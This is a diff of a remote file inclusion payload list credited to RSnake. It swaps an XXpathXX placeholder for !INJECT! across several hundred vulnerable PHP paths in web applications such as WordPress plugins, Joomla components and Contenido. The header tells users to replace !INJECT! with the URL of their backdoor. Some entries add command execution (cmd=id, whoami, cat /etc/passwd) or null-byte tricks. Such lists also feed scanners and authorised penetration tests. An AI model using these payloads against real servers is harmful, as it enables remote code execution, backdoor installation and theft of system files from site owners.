-/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
-/template.php?actionsPage=XXpathXX?
-/template.php?blog_theme=XXpathXX
-/template.php?pagina=XXpathXX
-/template/Noir/index.php?site_path=XXpathXX
-/template/Vert/index.php?pageAll=XXpathXX
-/template/Vert/index.php?site_path=XXpathXX
-/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
-/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
-/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
-/template/gwb/user_bottom.php?config[template_path]=XXpathXX
-/template/purpletech/base_include.php?page=XXpathXX?
-/template/rwb/user_bottom.php?config[template_path]=XXpathXX
-/template_csv.php?rInfo[content]=XXpathXX
-/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
-/templates/Official/part_userprofile.php?template_path=XXpathXX
-/templates/barrel/template.tpl.php?renderer=XXpathXX
-/templates/barrel/template.tpl.php?renderer=XXpathXX?
-/templates/barry/template.tpl.php?renderer=XXpathXX
-/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
-/templates/datumVonDatumBis.inc.php?root=XXpathXX
-/templates/default/header.inc.php?menu=XXpathXX
-/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
-/templates/default/tpl_message.php?right_file=XXpathXX
-/templates/footer.inc.php?root=XXpathXX
-/templates/header.inc.php?root=XXpathXX
-/templates/mylook/template.tpl.php?renderer=XXpathXX
-/templates/oerdec/template.tpl.php?renderer=XXpathXX
-/templates/pb/language/lang_nl.php?temppath=XXpathXX
-/templates/penguin/template.tpl.php?renderer=XXpathXX
-/templates/sidebar/template.tpl.php?renderer=XXpathXX
-/templates/slashdot/template.tpl.php?renderer=XXpathXX
-/templates/stylesheets.php?root=XXpathXX
-/templates/text-only/template.tpl.php?renderer=XXpathXX
-/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
-/theme/breadcrumb.php?rootBase=XXpathXX?
-/theme/default.php?root=XXpathXX
-/theme/format.php?_page_content=XXpathXX?
-/theme/format.php?_page_css=XXpathXX?
-/theme/frames1.php?root=XXpathXX
-/theme/frames1_center.php?root=XXpathXX
-/theme/frames1_left.php?root=XXpathXX
-/theme/frames1_top.php?root=XXpathXX
-/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
-/theme/settings.php?pfad_z=XXpathXX
-/theme/test1.php?root=XXpathXX
-/theme/test2.php?root=XXpathXX
-/theme/test3.php?root=XXpathXX
-/theme/test4.php?root=XXpathXX
-/theme/test5.php?root=XXpathXX
-/theme/test6.php?root=XXpathXX
-/themes.php?GLOBALS[theme_path]=XXpathXX?
-/themes/blackorange.php?root=XXpathXX
-/themes/container.php?theme_directory=XXpathXX%00
-/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
-/themes/default/preview_post_completo.php?dir=XXpathXX
-/themes/header.php?theme_directory=XXpathXX%00
-/themes/ubb/login.php?theme=XXpathXX
-/themes/ubb/login.php?theme=XXpathXX?
-/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
-/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
-/timedifference.php?la=XXpathXX
-/toolbar.loudmouth.php?mainframe=XXpathXX
-/tools/update_translations.php?_SESSION[path]=XXpathXX?
-/top.php?laypath=XXpathXX
-/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
-/topsites/index.php?page=XXpathXX?&
-/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
-/track.php?path=XXpathXX
-/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
-/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
-/twebs/modules/misc/usermods.php?ROOT=XXpathXX
-/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
-/unavailable.php?bibtexrootrel=XXpathXX?
-/unsubs.php?scdir=XXpathXX
-/up.php?my[root]=XXpathXX
-/upload.php?save_path=XXpathXX?
-/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
-/upload/top.php?maindir=XXpathXX?
-/upload/xax/admin/modules/install_module.php?level=XXpathXX?
-/upload/xax/admin/patch/index.php?level=XXpathXX?
-/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
-/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
-/upload_local.php?target=XXpathXX?
-/upload_multi.php?target=XXpathXX?
-/urlinn_includes/config.php?dir_ws=XXpathXX?
-/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
-/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
-/user_new_2.php?home=XXpathXX
-/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
-/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
-/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
-/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
-/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
-/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
-/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
-/vb/includes/functions.php?classfile=XXpathXX
-/vb/includes/functions_cron.php?nextitem=XXpathXX
-/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
-/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
-/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
-/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
-/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
-/view.php?ariadne=XXpathXX?
-/view.php?id=XXpathXX
-/view_func.php?i=XXpathXX&l=testfile.txt?
-/views/print/printbar.php?views_path=XXpathXX
-/visible_count_inc.php?statitpath=XXpathXX
-/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
-/volume.php?config[public_dir]=XXpathXX?
-/vote.php?Madoa=XXpathXX?
-/votebox.php?VoteBoxPath=XXpathXX
-/vp/configure.php?phpbb_root_path=XXpathXX?
-/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
-/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
-/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
-/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
-/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
-/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
-/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
-/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
-/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
-/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
-/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
-/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
-/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
-/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
-/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
-/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
-/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
-/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
-/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
-/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
-/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
-/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
-/war.php?vwar_root=XXpathXX
-/warn.php?file=XXpathXX
-/watermark.php?GALLERY_BASEDIR=XXpathXX
-/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
-/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
-/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
-/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
-/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
-/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
-/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
-/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
-/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
-/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
-/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
-/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
-/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
-/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
-/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
-/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
-/web/Flickrclient.php?path_prefix=XXpathXX
-/web/help.php?LIBSDIR=XXpathXX
-/web/includes/blogger.php?path_prefix=XXpathXX
-/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
-/web/includes/functions/html_generate.php?path_prefix=XXpathXX
-/web/includes/functions/validations.php?path_prefix=XXpathXX
-/web/index.php?LIBSDIR=XXpathXX
-/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
-/web/login.php?LIBSDIR=XXpathXX
-/web/logout.php?LIBSDIR=XXpathXX
-/web/lom.php?ETCDIR=XXpathXX
-/web/network_module_selector.php?path_prefix=XXpathXX
-/web/submit_abuse.php?path_prefix=XXpathXX
-/web/submit_comment.php?path_prefix=XXpathXX
-/webavis/class/class.php?root=XXpathXX?
-/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
-/webnews/template.php?content_page=XXpathXX?
-/webroot/css.php?CONFIGS=XXpathXX
-/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
-/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
-/window.php?action=XXpathXX
-/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
-/work/index.php?g_include=XXpathXX
-/work/module/forum/forum.php?g_include=XXpathXX
-/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
-/wp-cache-phase1.php?plugin=XXpathXX
-/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
-/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
-/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
-/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
-/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
-/wsk/wsk.php?wsk=XXpathXX
-/xarg_corner.php?xarg=XXpathXX?
-/xarg_corner_bottom.php?xarg=XXpathXX?
-/xarg_corner_top.php?xarg=XXpathXX?
-/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
-/xt_counter.php?server_base_dir=XXpathXX
-/yabbse/Sources/Packages.php?sourcedir=XXpathXX
-/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
-/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
-/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
-/zipndownload.php?PP_PATH=XXpathXX?
-/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
+# Compiled by @RSnake (2010-01-02).
+# Mostly from milw0rm, osvdb.org and elsewhere.
+# Change !INJECT! to the path of your backdoor.
+# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
+# E.g.: !INJECT! => http://www.example.com/hax.txt?
+
+/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
+/123flashchat.php?e107path=!INJECT!
+/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
+/22_ultimate/templates/header.php?mainpath=!INJECT!
+/22_ultimate/templates/header.php?mainpath=!INJECT!?
+/=!INJECT!
+/?_CONFIG[files][functions_page]=!INJECT!
+/?npage=-1&content_dir=!INJECT!%00&cmd=ls
+/?npage=1&content_dir=!INJECT!%00&cmd=ls
+/?show=!INJECT!?
+/A-Blog/navigation/donation.php?navigation_start=!INJECT!
+/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
+/A-Blog/navigation/links.php?navigation_start=!INJECT!?
+/A-Blog/navigation/search.php?navigation_end=!INJECT!?
+/A-Blog/sources/myaccount.php?open_box=!INJECT!?
+/ACGVnews/header.php?PathNews=!INJECT!
+/ATutor/documentation/common/frame_toc.php?section=!INJECT!
+/ATutor/documentation/common/search.php?section=!INJECT!
+/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
+/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
+/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
+/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
+/Administration/Includes/configureText.php?path_prefix=!INJECT!
+/Administration/Includes/contentHome.php?path_prefix=!INJECT!
+/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
+/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
+/Administration/Includes/userHome.php?path_prefix=!INJECT!
+/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
+/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
+/BE_config.php?_PSL[classdir]=!INJECT!
+/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
+/Base/Application.php?pear_dir=!INJECT!
+/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
+/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
+/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
+/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
+/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
+/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
+/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
+/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
+/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
+/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
+/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
+/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
+/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
+/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
+/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
+/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
+/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
+/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
+/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
+/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
+/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
+/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
+/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
+/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
+/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
+/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
+/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
+/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
+/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
+/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
+/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
+/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
+/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
+/CheckUpload.php?Language=!INJECT!&cmd=ls
+/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
+/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
+/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
+/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
+/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
+/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
+/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
+/DynaTracker_v151/action.php?base_path=!INJECT!
+/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
+/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
+/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
+/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
+/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
+/FirstPost/block.php?Include=!INJECT!
+/Flickrclient.php?path_prefix=!INJECT!
+/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
+/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
+/Full_Release/include/body_comm.inc.php?content=!INJECT!
+/Gallery/displayCategory.php?basepath=!INJECT!
+/Include/lib.inc.php3?Include=!INJECT!?
+/Include/variables.php3?Include=!INJECT!?
+/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
+/ListRecords.php?lib_dir=!INJECT!?&cmd=id
+/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
+/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
+/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
+/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
+/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
+/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
+/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
+/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
+/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
+/PHP/includes/header.inc.php?root=!INJECT!?
+/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
+/PaTh/index.php?rootpath=!INJECT!
+/Path_Script/createurl.php?formurl=!INJECT!
+/PhotoCart/adminprint.php?admin_folder=!INJECT!
+/Picssolution/install/config.php?path=!INJECT!?
+/RGboard/include/footer.php?_path[counter]=!INJECT!?
+/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
+/SQuery/lib/gore.php?libpath=!INJECT!
+/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
+/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
+/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
+/ScriptPath/footers.php?tinybb_footers=!INJECT!
